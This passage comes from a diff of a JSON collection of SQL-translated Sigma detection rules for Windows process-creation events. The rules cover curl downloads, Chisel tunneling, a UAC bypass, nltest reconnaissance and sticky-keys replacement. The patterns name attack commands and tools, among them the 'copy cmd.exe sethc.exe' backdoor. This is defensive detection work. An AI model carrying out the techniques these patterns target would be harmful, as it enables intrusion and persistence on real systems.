'%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusually Long PowerShell CommandLine", + "id": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "status": "test", + "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE 
'%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "status": "experimental", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE 
'\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate script" + "Legitimate processes that run at logon. 
Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE 
%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects file download using curl.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE 
'% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE 
'%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - 
"description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "status": "experimental", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.s0013", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 
'%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' 
OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Legitimate usage of \".diagcab\" files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% 
C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": "Suspicious Query of MachineGUID", - "id": "f5240972-3938-4e56-8e4b-e33893176c1f", - "status": "test", - "description": "Use of reg to get MachineGuid information", - "author": "frack113", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "status": "experimental", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_reg_machineguid.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Potential Exploitation Attempt Of 
